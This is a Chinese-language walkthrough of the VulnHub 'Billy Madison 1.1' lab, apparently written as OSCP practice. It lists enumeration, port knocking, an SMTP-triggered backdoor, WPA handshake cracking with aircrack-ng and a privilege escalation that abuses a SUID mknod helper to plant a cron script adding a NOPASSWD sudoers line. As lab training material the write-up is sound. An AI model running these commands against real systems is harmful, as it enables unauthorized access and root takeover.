仅以此文来记录我的oscp靶场训练过程
Billy Madison: 1.1 ~ VulnHub
拿到了靶机之后改为桥接导入VMware
kali和靶机全部上线后,nmap扫描 192.168.165.0/24
发现靶机ip为192.168.165.156
hping3
nmap
先跑一下ssh的弱口令 虽然没啥用
ncat -v 192.168.165.156 23
获取到了一些信息
获取到了一个密码rkfpuzrahngvat 及解密方式ROT
随便找了个解密网站CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码
ROT13出来为 exschmenuating
打开网页访问一下192.168.165.156:69 的 wordpress 但是打不开 有点奇怪
但是不妨碍用wpscan扫一下
获取到了一个用户admin
打开网页访问一下192.168.165.156:80
没啥有用的 Billy 可能是一个里面的用户名
dirb 跑一下看看
翻了翻没发现什么好东西 发现下面的de da 全是不同语言的页面罢了
还有139和445 samba
发现可以连接到EricsSecretStuff
基本用法
get xxxxx ;下载某个文件
put xxxxx ;上传某个文件
mget * ;下载当前目录下所有文件
tar c test.tar notes/ ; 打包notes目录下所有文件
尝试上传写入文件看看
不行 尝试下载看看
告诉我们有一个后门
到这貌似只剩下 2525 这个端口
直到现在没有什么思路了 看看老外的wp
发现之前的 exschmenuating 是一个目录
一个新页面 得到了一个信息 veronica 会以的名字的一部分 作为她的文件名 突然就想到了rockyou.txt 查看日志 发现我的ip被禁了 貌似是因为连接23端口
cat /usr/share/wordlists/rockyou.txt | grep -i veronica > /home/kali/Desktop/111.txt
使用grep 导出 rockyou 含有 veronica 的字典 然后dirb爆破
找到了 下载下来 使用wireshark 打开
总共6个邮件 都是发往2525端口的
EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: [email protected]
From: [email protected]
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/Hey Veronica,
Eric Gordon here.
I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users. Just click here to install it, k?
Thanks. -Eric
.
QUIT
EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!Eric,
Thanks for your message. I tried to download that file but my antivirus blocked it.
Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the "Spanish Armada" combo.
https://www.youtube.com/watch?v=z5YU7JwVy7s
-VV
.
QUIT
EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!Veronica,
Thanks that will be perfect. Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."
-Eric
.
QUITEHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:21 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!Eric,
Done.
-V
.
QUITEHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:31 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!Veronica,
Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that. Thanks!
-Eric
.
QUITEHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:41 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!Eric,
I clicked the link and now this computer is acting really weird. The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff. I'm going to send this email to you and then shut the computer down. I have some important files I'm worried about, and Billy's working on his big 12th grade final. I don't want anything to happen to that!
-V
.
QUIT
通过对话得知 这个 eric 骗 Veronica 下载了个病毒软件 并且还有个ftp服务器 除非连接到 Spanish Armada ??? 账号密码为 eric ericdoesntdrinkhisownpee.
打开 https://www.youtube.com/watch?v=z5YU7JwVy7s 开始英语听力
大致意思是 1066 1215 Spanish Armada 1466 67 1469 1514 1981 1986 Please do not do that
用 shell 敲击一下端口
for x in 1466 67 1469 1514 1981 1986; do nmap -Pn -host-timeout 201 -max-retries 0 -p $x 192.168.165.156; done
21端口打开可以连接了 使用之前的账号密码 发现有问题 后来百度了一下 输入 passive 即可正常
get .notes 下载下来打开后显示如下 其他的下载下来有点看不懂
Ugh, this is frustrating. I managed to make a system account for myself. I also managed to hide Billy's paperwhere he'll never find it. However, now I can't find it either :-(. To make matters worse, my privesc exploits aren't working. One sort of worked, but I think I have it installed all backwards.If I'm going to maintain total control of Billy's miserable life (or what's left of it) I need to root the box and find that paper!Fortunately, my SSH backdoor into the system IS working. All I need to do is send an email that includesthe text: "My kid will be a ________ _________"Hint: https://www.youtube.com/watch?v=6u7RsW5SAgsThe new secret port will be open and then I can login from there with my wifi password, which I'msure Billy or Veronica know. I didn't see it in Billy's FTP folders, but didn't have time tocheck Veronica's.-EG
大致意思就是说 需要知道一个wifi密码 我们查看了billy的ftp发现没有 那就只有 Veronica 的ftp有
查看视频发现 空白的话为 My kid will be a Soccer Player 并且需要发送一封电子邮件 可能会开启一个新的ssh端口
联系到之前Veronica 会将他的名字当成密码的一部分 我们爆破一下Veronica的ftp
登录成功后发现了两个文件 eg-01.cap email-from-billy.eml
email-from-billy.eml 如下
Sat, 20 Aug 2016 12:55:45 -0500 (CDT)Date: Sat, 20 Aug 2016 12:55:40 -0500To: [email protected]: [email protected]: test Sat, 20 Aug 2016 12:55:40 -0500X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/Eric's wifiHey VV,It's your boy Billy here. Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.I wasn't completely successful yet, but at least I got a start.I didn't walk away without doing my signature move, though. I left a flaming bag of dog poo on his doorstep. :-)Kisses,Billy
看来Billy 和 Eric 两个人都挺核善的 这个里面没有wifi密码
突然我想起了 之前使用的Aircrack-ng
获取的cap包的命名方式就很像抓到握手包的样子 可以尝试破解一下 这种破解速度很快所以我直接导入了 rockyou.txt 破解
aircrack-ng eg-01.cap -w /usr/share/wordlists/rockyou.txt
直接跑出来了获取到了wifi名称 EricGordon 密码 triscuit*
然后尝试匿名登录 获得如下信息 匿名登录 密码为随便一个邮箱即可
连接靶机2525端口 模仿之前抓到的cap包的邮件格式发送邮件 将内容更改为
My kid will be a soccer player
发送即可 重新扫描一下 发现目标开启了
<- 220 BM ESMTP SubEthaSMTP null -> EHLO kali<- 250-BM<- 250-8BITMIME<- 250-AUTH LOGIN<- 250 Ok -> MAIL FROM:<- 250 Ok -> RCPT TO:<- 250 Ok -> DATA<- 354 End data with . -> Date: Thu, 15 Sep 2016 07:57:56 -0400 -> To: [email protected] -> From: [email protected] -> Subject: My kid will be a soccer player -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ -> -> My kid will be a soccer player -> -> .<- 250 Ok -> QUIT<- 221 Bye=== Connection closed with remote host.
或者也可以
swaks --to [email protected] --from [email protected] --server 192.168.165.156:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"
重新扫描一下 发现开启了 1974 端口 开启的openssh 7.2p2
searchsploit一下 貌似只有枚举用户可以用
成功连接 eric 的ssh 准备提权
find / -user root -perm -4000 -ls 2>/dev/null
发现/usr/local/share/sgml/donpcgd 貌似可以在任何位置创建一个文件
eric@BM:~$ /usr/local/share/sgml/donpcgd /dev/null /etc/test#### mknod(/etc/testing,21b6,103)eric@BM:~$ ls -lah /etc/testcrw-rw-rw- 1 root root 1, 3 Sep 15 10:22 /etc/testeric@BM:~$ touch /tmp/testeric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test#### mknod(/etc/cron.hourly/test,81b4,0)eric@BM:~$ echo -e '#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/testeric@BM:~$ chmod +x /etc/cron.hourly/testeric@BM:~$ cat /etc/cron.hourly/test#!/bin/bashecho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
预计等一个小时 然后sudo su
已经获取了root
但是我们还要找Billy的丢失的文件
最后在根目录 /PRIVATE 文件夹找到了点有用的东西
需要我们使用cewl
从 Wikipedia 条目生成一个词表
正常来说没有proxy根本生成不了 推荐 proxychains
proxychains cewl --depth 0 -w billy-wiki.list https://en.wikipedia.org/wiki/Billy_Madison
挂了proxy后生成成功
接下来破解需要 truecrack kali直接安装即可
truecrack -w billy-wiki.list -t BowelMovement
跑出密码后 最后需要安装 veracrypt
openSUSE Software kali 安装推荐看这篇文章安装 也直接直接使用下面的命令
echo 'deb http://download.opensuse.org/repositories/home:/stevenpusser:/veracrypt/Debian_10/ /' | sudo tee /etc/apt/sources.list.d/home:stevenpusser:veracrypt.listcurl -fsSL https://download.opensuse.org/repositories/home:stevenpusser:veracrypt/Debian_10/Release.key | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/home_stevenpusser_veracrypt.gpg > /dev/nullsudo apt updatesudo apt install veracrypt
必须要先创建个文件夹再执行命令进去 获得一个zip文件 再解压一次
解密后得到两个文件
mkdir billyveracrypt -tc BowelMovement billy
解压完获得了两个文件
至此结束了 不得不说还是很有趣的 扩展了思路 感觉很不错的一个靶场 学到了很多命令 最头疼的一点就是21和1974端口 重启靶机之后重新执行命令才能打开